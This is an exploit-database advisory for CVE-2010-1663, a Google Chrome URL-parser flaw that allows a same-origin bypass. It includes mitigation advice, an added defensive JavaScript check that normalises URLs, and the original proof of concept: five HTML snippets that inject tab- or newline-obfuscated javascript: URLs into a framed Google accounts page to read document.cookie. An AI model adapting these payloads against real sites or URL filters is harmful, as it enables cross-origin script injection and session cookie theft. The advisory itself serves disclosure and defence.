Vendor: Chrome
By: Jordi Chancel
CVSS: 7.5 (HIGH)
CWE: 20 (Cross Origin Bypass)
Product Name: Chrome
Affected Version From: 4.1.249.1059
Affected Version To: 4.1.249.1064
Patch Exists: YES
Related CVE: CVE-2010-1663
CPE: a:google:chrome
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
Year: 2010

Google Chrome 4.1.249.1059 Cross Origin Bypass in Google URL (GURL)

The Google URL Parsing Library (also known as google-url or GURL) in Google Chrome before 4.1.249.1064 allows remote attackers to bypass the Same Origin Policy via a CHARACTER TABULATION or other escape characters inside a javascript: protocol string.

Mitigation:

Upgrade to Google Chrome 4.1.249.1064 or later, which contains the fix. Applications should additionally validate the origin of each request rather than relying on the browser alone to enforce cross-origin restrictions.
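The parser inconsistency the description refers to, shown as an added defensive example that is not part of the advisory or of Chromium's code: a raw-string scheme check misses the tab/newline-obfuscated variants, while a check that first applies the tab and newline stripping tolerant URL parsers perform recognises them. Assumes Node.js; the sample URLs are constructed.

```javascript
// Added example (not from the advisory or from Chromium). A naive scheme check
// compares the raw string, so "javascr\tipt:" is not treated as javascript:,
// while a tolerant URL parser strips the tab and canonicalises it to exactly
// that scheme. The hardened check normalises first, closing the gap.
// ASCII tab, line feed and carriage return are removed anywhere in the input;
// C0 controls and space are trimmed from both ends.
const TAB_OR_NEWLINE = /[\t\n\r]/g;
const LEADING_TRAILING_C0 = /^[\u0000-\u0020]+|[\u0000-\u0020]+$/g;

// Weak side of the inconsistency: a prefix comparison on the raw string.
function naiveIsJavascriptUrl(url) {
  return url.toLowerCase().startsWith("javascript:");
}

// Normalise the way tolerant URL parsers do before looking at the scheme.
function normalizeUrlInput(url) {
  return url.replace(TAB_OR_NEWLINE, "").replace(LEADING_TRAILING_C0, "");
}

// Scheme grammar: ALPHA *( ALPHA / DIGIT / "+" / "-" / "." ) then ":".
// Returns the lower-cased scheme, or null when the input has none.
function schemeOf(url) {
  const m = /^([A-Za-z][A-Za-z0-9+.-]*):/.exec(normalizeUrlInput(url));
  return m ? m[1].toLowerCase() : null;
}

// Hardened check: decide on the canonicalised scheme, not the raw bytes.
function hardenedIsJavascriptUrl(url) {
  return schemeOf(url) === "javascript";
}

// What a navigation sink should do instead: allow-list http(s) only.
function isSafeNavigationTarget(url) {
  const scheme = schemeOf(url);
  return scheme === "http" || scheme === "https";
}

// Constructed inputs modelled on the advisory's PoC variants (tab, LF, CR).
const SAMPLES = [
  "javascript:alert(1)",
  "javascr\tipt:alert(1)",
  "javascr\nipt:alert(1)",
  "javascr\ript:alert(1)",
  "https://www.example.org/accounts",
];

for (const url of SAMPLES) {
  console.log(JSON.stringify(url), naiveIsJavascriptUrl(url), hardenedIsJavascriptUrl(url), isSafeNavigationTarget(url));
}
```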

Exploit-DB raw data:

#	Google Chrome 4.1.249.1059 Cross Origin Bypass in Google URL (GURL)
#
#	CVE-ID: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1663
#
#	Author: Jordi Chancel
#
#	Software Link: http://googlechromereleases.blogspot.com/2010/04/stable-update-bug-and-security-fixes.html
#
#	Description: {
#		The Google URL Parsing Library (aka google-url or GURL) in Google Chrome 
#		before 4.1.249.1064 allows remote attackers to bypass the Same Origin Policy 
#		via CHARACTER TABULATION or other escape characters inside a javascript: protocol string. }
#
#	Some PoC:

<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe> 
<a href="#" value="test" onclick="window.open('javascr\u0009ipt:alert(document.cookie)','test')" >Inject JavaScript</a>
----
<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe> 
<a href="#" value="test" onclick="window.open('javascr\x09ipt:alert(document.cookie)','test')" >Inject JavaScript</a>
----
<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe> 
<a href="#" value="test" onclick="window.open('javascr\nipt:alert(document.cookie)','test')" >Inject JavaScript</a>
----
<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe> 
<a href="#" value="test" onclick="window.open('javascr\ript:alert(document.cookie)','test')" >Inject JavaScript</a>
----
<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe> 
<a href="#" value="test" onclick="window.open('javascr\tipt:alert(document.cookie)','test')" >Inject JavaScript</a>

Greetz : Xylitol , Eddy Bordi , 599eme Man , Gnouf , CTZ .